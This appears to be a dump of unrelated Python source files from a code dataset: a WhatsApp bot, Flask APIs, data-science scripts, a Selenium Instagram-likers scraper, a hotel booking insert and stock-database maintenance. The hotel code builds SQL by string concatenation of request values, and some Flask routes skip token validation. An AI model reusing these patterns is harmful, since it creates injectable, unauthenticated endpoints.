attachment_verification()\n import_message()\n\n # Login and Scan\n whatsapp_login()\n\n # Sending the messages\n sender(list_of_contact, isAttach, image_path)\n\n print(\"Done!\\nKontak kontak tanpa WA disimpan pada file 'contact_error.txt'\")\n","sub_path":"WA_bot.py","file_name":"WA_bot.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"96446758","text":"from flask import request, Blueprint, jsonify\nfrom evodoc import DbException, ApiException\nfrom evodoc.entity import Package\nfrom evodoc.api import response_ok, response_ok_obj, response_ok_list, validate_token, validate_data\n\npackage = Blueprint('package', __name__, url_prefix='/package')\n\n@package.route('', methods=['GET'])\ndef get_package_by_id_action():\n \"\"\"\n Get packge by id\n \"\"\"\n token = request.args.get('token')\n validate_token(token)\n package_id = request.args.get('package_id')\n data = Package.get_package_by_id(package_id)\n return response_ok_obj(data)\n\n@package.route('/all', methods=['GET'])\ndef get_all_packages():\n \"\"\"\n Return all packages\n \"\"\"\n token = request.args.get('token')\n validate_token(token)\n return response_ok_list(Package.get_all_packages())\n\n@package.route('', methods=['POST'])\ndef save_package():\n \"\"\"\n Saves package (create or update)\n \"\"\"\n data = request.get_json()\n validate_data(data, {'token'})\n validate_token(data['token'])\n package = Package.save_or_create(data)\n return response_ok_obj(package)\n\n@package.route('/down', methods=['POST'])\ndef download_package():\n \"\"\"\n Tries to retrieve package from git\n \"\"\"\n data = request.get_json()\n validate_data(data, {'token', 'package_id'})\n package = Package.get_package_by_id(data['package_id'])\n package.download_package()\n return response_ok({'data': 'Done'})\n\n@package.route('', methods=['DELETE'])\ndef delete_package():\n \"\"\"\n Deletes package\n \"\"\"\n data = request.get_json()\n validate_data(data, {'token', 'package_id'})\n package = Package.get_package_by_id(data['package_id'])\n package.delete_package()\n data = {\n \"data\": \"done\"\n }\n return response_ok(data)\n\n@package.errorhandler(ApiException)\n@package.errorhandler(DbException)\ndef __response_err(data):\n return jsonify(data.message), data.errorCode\n","sub_path":"evodoc/api/packageapi.py","file_name":"packageapi.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63181406","text":"from flask import *\r\nfrom flask_wtf import FlaskForm #基类\r\nfrom whoosh import analysis\r\nfrom flask import session\r\n\r\n\r\ndenoise_app = Blueprint(\"denoise\",__name__,url_prefix=\"/denoise/\")\r\n@denoise_app.route('/',methods=['GET','POST'])\r\ndef denoise():\r\n img_list = []\r\n Annotation = []\r\n No = 0\r\n cnt =0\r\n annotation = {}\r\n with open('../annotation_prepare/annotation_new.txt','r') as f:\r\n for line in f:\r\n line = line.split('\\t')\r\n img_name = line[0].split('/')[-1]\r\n anno = line[2]\r\n annotation[img_name] = anno\r\n annotation_sort = sorted(annotation.items(),key=lambda y: y[0])\r\n for k in annotation_sort[380:600]:\r\n img_list.append([k[0]])\r\n Annotation.append(k[1])\r\n print('length: ',len(img_list))\r\n # if 'img_anno' not in session:\r\n # session['img_anno'] = []\r\n # with open('../annotation_prepare/Cluster.txt','r') as f:\r\n # for line in f:\r\n # # if len(session['img_anno'])<5000:\r\n # # session['img_anno'].append([' ',' ',' '])\r\n # # continue\r\n # line0 = line.strip()\r\n # line = line.strip().split('\\t')\r\n # if len(line)>2:\r\n # session['img_anno'].append([line[1],line[2],line0])\r\n # else:\r\n # session['img_anno'].append([line[1],' ',line0])\r\n # if request.method == 'POST':\r\n # No = int(request.form.get('No'))\r\n # for k in range(min(10,len(session['img_anno'])-No)):\r\n # flag = 1\r\n # feedback = [0,0]\r\n # if request.form.get('accurate'+str(k)):\r\n # feedback[0] = 1\r\n # if request.form.get('noise'+str(k)):\r\n # feedback[1] = 1\r\n # flag = 0\r\n # if flag == 1:\r\n # line = session['img_anno'][No+k][2]\r\n # line += '\\t' + str(feedback[0])+'\\t'+str(feedback[1])+'\\n'\r\n # with open('annotation.txt','a+') as f:\r\n # f.write(line)\r\n # No += 10\r\n # if No>=len(session['img_anno'])-1:\r\n # No = 0\r\n # img_list = []\r\n # Annotation = []\r\n # for k in range(min(10,len(session['img_anno'])-No)):\r\n # img_list += [session['img_anno'][No+k][0].split(',')]\r\n # Annotation += [session['img_anno'][No+k][1]]\r\n # else:\r\n # No = 6030\r\n # img_list = []\r\n # Annotation = []\r\n # for k in range(10):\r\n # img_list += [session['img_anno'][No+k][0].split(',')]\r\n # Annotation += [session['img_anno'][No+k][1]]\r\n return render_template('DenoisePage.html',content={'img_list':img_list,'Annotation':Annotation,'No':No})","sub_path":"blueprints/DenoisePage.py","file_name":"DenoisePage.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140349009","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 19 10:08:29 2018\n\n@author: Patrick\n\"\"\"\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.feature_selection import VarianceThreshold, SelectKBest, chi2, f_regression, mutual_info_regression\n\n\n# data set from jay divided into two files, and august 2017 removed\nattributes = \"2018_Attributes.csv\"\nattributes_df = pd.read_csv(attributes)\ntargets = \"2018_Targets.csv\"\n#targets dataframe contains all groups including Food 17\ntargets_df = pd.read_csv(targets)\n\n#cant get this to work right (trying to remove hist before 1999)\n#targets_df = targets_df[int(targets_df.Timestamp) >= 36161]\n#attributes_df = attributes_df[int(attributes_df.Timestamp) >= 36161]\n\n#targets_df = targets_df[171:]\n#attributes_df = attributes_df[171:]\n\n#print(\"Attributes DataFrame:\")\n#print(str(attributes_df.info()))\n#print(attributes_df.head())\n\n#print(\"Targets DataFrame:\")\n#print(str(targets_df.info()))\n\n#print(\"Food 17 Dataframe:\")\n#print(str(CPI_df.info()))\n\n\n\ntimestamps_df = attributes_df['Timestamp']\nfood17_target_df = targets_df['Food 17']\n\n# remoe the timestamps from both\ntargets_df = targets_df.drop('Timestamp', axis = 1)\nattributes_df = attributes_df.drop('Timestamp', axis = 1)\n\n\n# drop all attributes that are missing values for now\n# revise this later when we predict them.\nattributes_df =attributes_df.dropna(how='any', axis = 1)\n\n#feature selection by variance\n#sel = VarianceThreshold(threshold=(.8 * (1 - .8)))\n#attributes_df = sel.fit_transform(attributes_df)\n\natt_df = attributes_df\n\nMSE = []\n\nfor x in range(3, 15):\n \n attributes_df = SelectKBest(mutual_info_regression,k= x).fit_transform(att_df,food17_target_df)\n \n print(\"K = \",x)\n #print(attributes_df.info())\n #print(attributes_df.head())\n #print(attributes_df.head())\n \n #how much to take off timeframe in months negative\n #will be used for predicting each year based on years before\n #currently doesnt line up with years since last record is July 2017\n fiveyear = -60 #months\n fouryear = -48\n threeyear = -36\n twoyear = -24\n oneyear = -12\n sixmonth = -6\n \n #one year divide into testing and training \n #attributes\n att_train_oneyear_df = attributes_df[:oneyear]\n att_test_oneyear_df = attributes_df[oneyear:]\n #target groupings\n tar_train_oneyear__df = targets_df[:oneyear]\n tar_test_oneyear_df = targets_df[oneyear:]\n # food 17 alone\n food17_train_oneyear_df =food17_target_df[:oneyear]\n food17_test_oneyear_df =food17_target_df[oneyear:]\n \n #last six months\n #attributes\n att_train_sixmonth_df = attributes_df[:sixmonth]\n att_test_sixmonth_df = attributes_df[sixmonth:]\n #target groupings\n tar_train_sixmonth__df = targets_df[:sixmonth]\n tar_test_sixmonth_df = targets_df[sixmonth:]\n # food 17 alone\n food17_train_sixmonth_df =food17_target_df[:sixmonth]\n food17_test_sixmonth_df =food17_target_df[sixmonth:]\n \n #2 years ago\n #attributes\n att_train_twoyear_df = attributes_df[:twoyear]\n att_test_twoyear_df = attributes_df[twoyear:oneyear]\n #target groupings\n tar_train_twoyear__df = targets_df[:twoyear]\n tar_test_twoyear_df = targets_df[twoyear:oneyear]\n # food 17 alone\n food17_train_twoyear_df =food17_target_df[:twoyear]\n food17_test_twoyear_df =food17_target_df[twoyear:oneyear]\n \n #3 years ago\n #attributes\n att_train_threeyear_df = attributes_df[:threeyear]\n att_test_threeyear_df = attributes_df[threeyear:twoyear]\n #target groupings\n tar_train_threeyear__df = targets_df[:threeyear]\n tar_test_threeyear_df = targets_df[threeyear:twoyear]\n # food 17 alone\n food17_train_threeyear_df =food17_target_df[:threeyear]\n food17_test_threeyear_df =food17_target_df[threeyear:twoyear]\n \n #4 years ago\n #attributes\n att_train_fouryear_df = attributes_df[:fouryear]\n att_test_fouryear_df = attributes_df[fouryear:threeyear]\n #target groupings\n tar_train_fouryear__df = targets_df[:fouryear]\n tar_test_fouryear_df = targets_df[fouryear:threeyear]\n # food 17 alone\n food17_train_fouryear_df =food17_target_df[:fouryear]\n food17_test_fouryear_df =food17_target_df[fouryear:threeyear]\n \n #5 years ago\n #attributes\n att_train_fiveyear_df = attributes_df[:fiveyear]\n att_test_fiveyear_df = attributes_df[fiveyear:fouryear]\n #target groupings\n tar_train_fiveyear__df = targets_df[:fiveyear]\n tar_test_fiveyear_df = targets_df[fiveyear:fouryear]\n # food 17 alone\n food17_train_fiveyear_df =food17_target_df[:fiveyear]\n food17_test_fiveyear_df =food17_target_df[fiveyear:fouryear]\n \n \n #LAST 12 MONTHS!\n #code below modified version of:\n #http://scikit-learn.org/stable/auto_examples/linear_model/plot_ols.html\n # Create linear regression object for one year\n regr_oneyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_oneyear.fit(att_train_oneyear_df, food17_train_oneyear_df)\n # Make predictions using the testing set\n food17_pred_oneyear = regr_oneyear.predict(att_test_oneyear_df)\n # The coefficients\n print(\"2016-08-01 to 2017-07-01\")\n print('Coefficients: \\n', regr_oneyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_oneyear_df, food17_pred_oneyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_oneyear_df, food17_pred_oneyear))\n \n \n #TWO YEARS BACK 12 MONTHS!\n regr_twoyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_twoyear.fit(att_train_twoyear_df, food17_train_twoyear_df)\n # Make predictions using the testing set\n food17_pred_twoyear = regr_twoyear.predict(att_test_twoyear_df)\n # The coefficients\n print(\"2015-08-01 to 2016-07-01\")\n print('Coefficients: \\n', regr_twoyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_twoyear_df, food17_pred_twoyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_twoyear_df, food17_pred_twoyear))\n \n \n #THREE YEARS BACK 12 MONTHS!\n regr_threeyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_threeyear.fit(att_train_threeyear_df, food17_train_threeyear_df)\n # Make predictions using the testing set\n food17_pred_threeyear = regr_threeyear.predict(att_test_threeyear_df)\n # The coefficients\n print(\"2014-08-01 to 2015-07-01\")\n print('Coefficients: \\n', regr_threeyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_threeyear_df, food17_pred_threeyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_threeyear_df, food17_pred_threeyear))\n \n \n \n #FOUR YEARS BACK 12 MONTHS!\n regr_fouryear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_fouryear.fit(att_train_fouryear_df, food17_train_fouryear_df)\n # Make predictions using the testing set\n food17_pred_fouryear = regr_fouryear.predict(att_test_fouryear_df)\n # The coefficients\n print(\"2013-08-01 to 2014-07-01\")\n print('Coefficients: \\n', regr_fouryear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_fouryear_df, food17_pred_fouryear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_fouryear_df, food17_pred_fouryear))\n \n \n #FIVE YEARS BACK 12 MONTHS!\n regr_fiveyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_fiveyear.fit(att_train_fiveyear_df, food17_train_fiveyear_df)\n # Make predictions using the testing set\n food17_pred_fiveyear = regr_fiveyear.predict(att_test_fiveyear_df)\n # The coefficients\n print(\"2012-08-01 to 2013-07-01\")\n print('Coefficients: \\n', regr_fiveyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_fiveyear_df, food17_pred_fiveyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_fiveyear_df, food17_pred_fiveyear))\n\n\n\n\n\n","sub_path":"Codebase_2018/walter/code/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"188078498","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jul 17 17:29:43 2018\r\n\r\n@author: yang\r\n\"\"\"\r\n\r\nimport os;\r\nimport pypinyin\r\nfrom pypinyin import pinyin\r\n\r\n \r\ndef main(path): \r\n filelist=os.listdir(path)\r\n for files in filelist:\r\n Olddir=os.path.join(path,files);\r\n if os.path.isdir(Olddir):\r\n \r\n continue;\r\n filename=os.path.splitext(files)[0]; \r\n filename1 = pinyin(filename, style=pypinyin.FIRST_LETTER) \r\n filename2 = []\r\n for i in filename1:\r\n lenth = 0\r\n for j in i[0] :\r\n lenth += 1\r\n if lenth>1:\r\n filename2.extend(i)\r\n filenameToStr = ''.join(filename2) \r\n filetype=os.path.splitext(files)[1]; \r\n Newdir=os.path.join(path,filenameToStr + filetype);\r\n os.rename(Olddir,Newdir);\r\nprint(\"--enter the file_path--\")\r\ni = input()\r\nmain(i)\r\nprint(\"Processing completed\")\r\nos.system(\"pause\")","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"492340799","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom utils import xpath\nfrom dateutil.parser import parse\n\ndef get_likers(driver2):\n time.sleep(3)\n driver2.find_element(By.XPATH, xpath['likers_button']).click()\n likers_body = WebDriverWait(driver2, 10).until(EC.presence_of_element_located((By.XPATH, xpath['likers_div'])))\n time.sleep(3)\n likers = []\n previous_len=-1\n while len(likers)>previous_len:\n previous_len = len(likers)\n elements = likers_body.find_elements(By.TAG_NAME, 'a')\n for el in elements:\n if el.get_attribute('title') and el.get_attribute('title') not in likers:\n likers.append(el.get_attribute('title'))\n driver2.execute_script(\"arguments[0].scrollTop = arguments[0].scrollHeight\", likers_body)\n time.sleep(1)\n return likers\n\ndef get_post_info(post_link, driver2):\n driver2.get(post_link)\n date = WebDriverWait(driver2, 10).until(EC.presence_of_element_located((By.XPATH, xpath['post_date']))).get_attribute('datetime')\n date = parse(date)\n likers = ['This is a video']\n try:\n likers = get_likers(driver2)\n except:\n pass\n return likers, date","sub_path":"insta_bot/post_info.py","file_name":"post_info.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"68878867","text":"from kitchen import kitchenState, annotatedRecipe\nfrom esdcs.groundings import PhysicalObject\n\n#19\n#http://www.food.com/recipe/impossible-peanut-butter-cookies-15411\n#\n#1 cup peanut butter (your choice, smooth or chunky)\n#1 cup granulated sugar\n#1 large egg\n#\n#1 Mix peanut butter, sugar, and egg together until smooth.\n#2 Drop by teaspoon onto cookie sheet two inches apart. \n#3 Press with fork; press again in opposite direction\n#4 Bake 10 to 12 minutes at 350 degrees Fahrenheit.\n#5 Do not brown; do not over bake.\n\nrecipeName = \"Impossible Peanut Butter Cookies\"\nrecipeSource = \"http://www.food.com/recipe/impossible-peanut-butter-cookies-15411\"\n\n#replace None with Physical Objects\ningredientsList = [(\"1 cup peanut butter (your choice, smooth or chunky)\", kitchenState.Ingredient(contains=[\"peanut_butter\"], homogenous=True, amount=\"1 cup peanut butter\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['peanutbutter']))),\n (\"1 cup granulated sugar\", kitchenState.Ingredient(contains=[\"sugar\"], homogenous=True, amount=\"1 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(5, 1, 1, 2), lcmId=2, tags=['sugar']))),\n (\"1 large egg\", kitchenState.Ingredient(contains=[\"eggs\"], homogenous=True, amount=\"1\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 3, 1, 2), lcmId=3, tags=['eggs'])))]\n\ninstructionsList = [(\"1 Mix peanut butter, sugar, and eggs together until smooth.\", \"pour(peanut_butter), pour(sugar), pour(eggs), mix()\"),\n (\"2 Drop by teaspoon onto cookie sheet two inches apart.\", \"scrape()\"),\n (\"3 Press with form; press gain in opposite direction.\", \"noop()\"),\n (\"4 Bake 10 to 12 minutes at 350 degrees Fahrenheit\", \"preheat(350), bake(10)\"),\n (\"5 Do not brown; do not over bake.\", \"noop()\")]\n\nannotatedRecipeObject = annotatedRecipe.AnnotatedRecipe(recipeName, recipeSource, ingredientsList, instructionsList)\n\n","sub_path":"data/kitchen/data/impossiblePeanutButterCookiesRecipe.py","file_name":"impossiblePeanutButterCookiesRecipe.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"573873783","text":"import json\r\nimport random\r\nfrom sqlwrapper import gensql,dbget,dbput\r\nimport datetime\r\nfrom ApplicationDate import application_date\r\n\r\ndef HOTEL_BBL_POST_INSERT_BusinessBlock(request):\r\n sql_value = json.loads(dbget(\"select count_id from business_block.count\"))\r\n print(sql_value,type(sql_value))\r\n \r\n sql_value1 = sql_value[0]['count_id']\r\n #sql = int(sql_value1)\r\n print(sql_value1,type(sql_value1))\r\n\r\n count = sql_value1 + 1\r\n print(count)\r\n\r\n psql = dbput(\"update business_block.count set count_id = '\"+str(sql_value[0]['count_id']+1)+\"'\")\r\n print(psql)\r\n d = request.json\r\n E = d['Inquiry']\r\n E = { k : v for k,v in E.items() if v != ''} \r\n print(E)\r\n E['block_id'] = count\r\n random_no = (random.randint(1000000000,9999999999))\r\n random_no = str(random_no)\r\n random_no = random_no[0:4]\r\n print(random_no)\r\n pf_id = E.get(\"pf_id\")\r\n PF_ACCOUNT = json.loads(dbget(\"select pf_account from profile.pf_company_profile where pf_id = '\"+pf_id+\"'\"))\r\n PF_ACCOUNT = PF_ACCOUNT[0]['pf_account']\r\n pf_account = PF_ACCOUNT[0:5]\r\n E['block_status'] = \"Inquiry\"\r\n E['block_code'] = random_no + pf_account\r\n E['block_name'] = PF_ACCOUNT\r\n sql = gensql('insert','business_block.business_block',E)\r\n print(sql)\r\n #inquiry grid\r\n id11 = E.get(\"block_id\")\r\n g = d['Inquiry_grid']\r\n print(g,type(g))\r\n \r\n\r\n for i in g:\r\n j = { k : v for k,v in i.items() if v != ''} \r\n j['block_id'] = id11\r\n \r\n psql = gensql('insert','business_block.inquiry_grid',j)\r\n\r\n\r\n s = {}\r\n s['user_role'] = \"Supervisor\"\r\n blockname = E.get(\"block_name\")\r\n app_datetime = application_date()\r\n #RES_Log_Time = datetime.datetime.utcnow()+datetime.timedelta(hours=5, minutes=30)\r\n RES_Log_Time = app_datetime[0]\r\n RES_Log_Date = app_datetime[1]\r\n print(RES_Log_Date)\r\n s['date'] = RES_Log_Date\r\n s['time'] = RES_Log_Time\r\n s['block_id'] = count\r\n s['action_type_id'] = \"Business Block in inquiry status\"\r\n s['description'] = \"Business Block in inquiry status for\"+\" \"+str(blockname)\r\n gensql('insert','business_block.business_block_activity_log',s)\r\n return(json.dumps({\"Return\": \"Record Inserted Successfully\",\"ReturnCode\": \"RIS\",\"Status\": \"Success\",\"StatusCode\": \"200\"},indent=4))\r\n\r\ndef HOTEL_BBL_POST_SELECT_QueryInquiryGrid(request):\r\n d = request.json\r\n sql = json.loads(gensql('select','business_block.inquiry_grid','*',d))\r\n return(json.dumps({'Status': 'Success', 'StatusCode': '200','ReturnValue':sql ,'ReturnCode':'RRTS'},indent=4))\r\n \r\n","sub_path":"HOTEL_BBL_POST_INSERT_BusinessBlock.py","file_name":"HOTEL_BBL_POST_INSERT_BusinessBlock.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"38944644","text":"import logging\nimport random\nimport threading\nimport time\nfrom other_module.something import do_something\n\nlogger = logging.getLogger(__name__)\n\n\nclass ThreadFilter():\n def __init__(self, id):\n self.id = id\n\n def filter(self, record):\n return record.thread == self.id\n\n\ndef do_some_work(worker_id):\n # setup logger\n worker_log_filename = 'logging_test_worker_%d.log' % worker_id\n\n worker_log_format = logging.Formatter('%(asctime)-15s %(levelname)-8s %(message)s')\n\n worker_log_handler = logging.FileHandler(worker_log_filename)\n worker_log_handler.setFormatter(worker_log_format)\n worker_log_handler.setLevel(logging.INFO)\n worker_log_handler.addFilter(ThreadFilter(threading.get_ident()))\n\n logging.getLogger('').addHandler(worker_log_handler)\n\n # do some work\n logger.info('Hello from worker %d' % worker_id)\n do_something(worker_id)\n time.sleep(random.randint(1, 10))\n logger.info('Goodbye from worker %d' % worker_id)\n\n logger.removeHandler(worker_log_handler)\n","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"398901373","text":"\"\"\"TheMovieDB models.\"\"\"\n\n\nclass Movie:\n \"\"\"Basic movie model with information.\"\"\"\n\n def __init__(self, data):\n \"\"\"Initiate with json data from web service.\n\n Args:\n data (json): parsed json from native json library.\n \"\"\"\n self.adult = data['adult']\n self.backdrop_path = data['backdrop_path']\n self.genre_ids = data['genre_ids']\n self.id = data['id']\n self.original_language = data['original_language']\n self.original_title = data['original_title']\n self.overview = data['overview']\n self.release_date = data['release_date']\n self.poster_path = data['poster_path']\n self.popularity = data['popularity']\n self.title = data['title']\n self.video = data['video']\n self.vote_average = data['vote_average']\n self.vote_count = data['vote_count']\n self.media_type = data['media_type']\n","sub_path":"themoviedb/models/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553317227","text":"import sys\nsys.path.append(\"D:/codes/stocks/infomationTools\") \nfrom parentObject import generalFunction\nfrom stock.dataSourceParse import constructDatabase\nfrom stock.dataSourceParse import updateDatabase\nfrom stock.dataSourceParse import getStockCodeList\n\n\nclass maintainDatabase(generalFunction):\n\t\"\"\"docstring for maintainDatabase\"\"\"\n\tdef __init__(self,indexFilePath = \"D:/programe-data/database/stockHistInfoDatabase/000827_index_components.txt\"\n\t\t, databasePath = \"D:/programe-data/database/stockHistInfoDatabase/stockFinanInfo.db\"\n\t\t,logFile = \"D:/programe-data/database/stockHistInfoDatabase/finanUpdate.log\"):\n\t\tself.iF = indexFilePath \n\t\tself.dp = databasePath\n\t\tself.log = logFile\n\n\tdef tableNameList(self,databasePath):\n\t\timport sqlite3\n\t\tconn = sqlite3.connect(databasePath)\n\t\tcursor = conn.cursor()\n\t\tcursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n\t\ttableList = cursor.fetchall()\n\t\tcursor.close()\n\t\tconn.close()\n\t\ttableNameList = []\n\t\tfor item in tableList:\n\t\t\ttableNameList.append(item[0])\n\t\treturn(tableNameList)\n\tdef loadIndexComponent(self,filePath ):\n\t\timport json\n\t\tindexDict = json.load(open(filePath))\n\t\t#indexDict {'date':[component],'date':[],...}\n\t\treturn(indexDict)\n\n\n\tdef maintainDbAll(self):\n\t\timport datetime\n\t\tlogHandle = open(self.log,'a')\n\t\tgetStockCodeList(self.dp)\t\n\t\tstockCodeList = getStockCodeList(self.dp).getListofStockCode()\t\n\t\tuniqueStokeList1 = list(set(stockCodeList))\t\n\t\tstockTableList = self.tableNameList(self.dp)\n\t\t#print(stockTableList)\n\t\tprint(len(uniqueStokeList1))\n\t\tlogHandle.write(str(datetime.datetime.today()) + \" \" + str(len(uniqueStokeList1)) + \" stock codes\\n\")\n\t\tprint(sys.argv)\n\t\tif len(sys.argv) < 2:\n\t\t\t#self.updateMgsy(uniqueStokeList1,stockTableList,logHandle)\n\t\t\tself.updateMgjzc(uniqueStokeList1,stockTableList,logHandle)\n\t\t\t# self.updateSinaFh(uniqueStokeList1,stockTableList,logHandle)\n\t\telse:\t\t\t\n\t\t\t# if 'fh' in sys.argv[1:]:\n\t\t\t# \tself.updateSinaFh(uniqueStokeList1,stockTableList,logHandle)\n\t\t\tif 'mgsy' in sys.argv[1:]:\n\t\t\t\tself.updateMgsy(uniqueStokeList1,stockTableList,logHandle)\n\t\t\tif \"mgjzc\" in sys.argv[1:]:\n\t\t\t\tself.updateMgjzc(uniqueStokeList1,stockTableList,logHandle)\t\n\t\tlogHandle.close()\n\n\tdef updateMgsy(self,uniqueStokeList,stl,logH):\n\t\tlogHandle = logH\n\t\tstockTableList = stl\n\t\tuniqueStokeList1 = uniqueStokeList\n\t\tfor item in uniqueStokeList1:\n\t\t\t#print(\"doing \" + item)\n\t\t\tmgsyName = \"MeiGuShouYi_\" + item[0:6]\n\t\t\t#mgjzcName = \"MeiGuJingZiChan_\" + item[0:6]\n\t\t\t#fhName = \"MeiNianFenHong_\" + item[0:6]\n\t\t\tif mgsyName in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tupdateDatabase(item[0:6],item[6:9],'N','N',self.dp).meiGuShouYiUpdate()\n\t\t\t\t\t#print('updated mgsy ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgsy update\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't update \" + item + \" meiGuShouYi\" + \"\\n\")\n\t\t\t\t\tcontinue\n\t\t\telif mgsyName not in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tconstructDatabase(item[0:6],item[6:9],'N','N',self.dp).writeGunDongJingZhiMeiGuShouYiToDatabase()\n\t\t\t\t\t#print('constrcted mgsy ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgsy construct\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't construct \" + item + \"meiGuShouYi\" + \"\\n\")\n\t\t\t\t\tcontinue\n\tdef updateMgjzc(self,uniqueStokeList,stl,logH):\n\t\tlogHandle = logH\n\t\tstockTableList = stl\n\t\tuniqueStokeList1 = uniqueStokeList\t\t\t\n\t\tfor item in uniqueStokeList1:\n\t\t\t#print(\"doing \" + item)\n\t\t\t#mgsyName = \"MeiGuShouYi_\" + item[0:6]\n\t\t\tmgjzcName = \"MeiGuJingZiChan_\" + item[0:6]\n\t\t\t#fhName = \"MeiNianFenHong_\" + item[0:6]\t\n\t\t\tif mgjzcName in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tupdateDatabase(item[0:6],item[6:9],'N','N',self.dp).meiGuJingZiChanUpdate()\n\t\t\t\t\t#print(\"updated mgjzc \" + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgjzc update\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't update \" + item + \" meiGuJingZiChan\" + \"\\n\")\n\t\t\t\t\tcontinue\t\n\t\t\telif mgjzcName not in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tconstructDatabase(item[0:6],item[6:9],'N','N',self.dp).writeMeiGuJingZiChanToDatabase()\n\t\t\t\t\t#print('constrcted mgjzc ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgjzc construct\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't construct \" + item + \" meiGuJingZiChan\" + \"\\n\")\n\t\t\t\t\tcontinue\n\tdef updateSinaFh(self,uniqueStokeList,stl,logH):\n\t\tlogHandle = logH\n\t\tstockTableList = stl\n\t\tuniqueStokeList1 = uniqueStokeList\t\t\t\n\t\tfor item in uniqueStokeList1:\n\t\t\t#print(\"doing \" + item)\n\t\t\t#mgsyName = \"MeiGuShouYi_\" + item[0:6]\n\t\t\t#mgjzcName = \"MeiGuJingZiChan_\" + item[0:6]\n\t\t\tfhName = \"MeiNianFenHong_\" + item[0:6]\t\t\t\n\t\t\tif fhName in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tupdateDatabase(item[0:6],item[6:9],'N','N',self.dp).fenHongFromSinaUpdate()\n\t\t\t\t\t#print(\"updated mgjzc \" + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + ' fh update')\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't update \" + item + \" fenHongFromSina\" + \"\\n\")\n\t\t\t\t\tcontinue\t\n\t\t\telif fhName not in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tconstructDatabase(item[0:6],item[6:9],'N','N',self.dp).writeFenHongFromSinaIntoDatabase()\n\t\t\t\t\t#print('constrcted mgjzc ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" fh construct\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't construct \" + item + \" fenHongFromSina\" + 